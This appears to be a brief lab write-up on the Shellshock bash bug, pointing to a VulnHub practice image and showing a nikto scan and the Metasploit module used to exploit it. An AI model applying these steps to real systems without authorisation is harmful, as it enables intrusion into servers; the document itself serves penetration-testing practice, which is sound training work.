https://en.wikipedia.org/wiki/Shellshock_(software_bug)
Lab Download:
https://www.vulnhub.com/entry/pentester-lab-cve-2014-6271-shellshock,104/
Vulnerability detection
nikto -h ipadress
Shellshock Exploit
Open msfconsole
use exploit/multi/http/apache_mod_cgi_bash_env_exec
As you can see we hacked the system.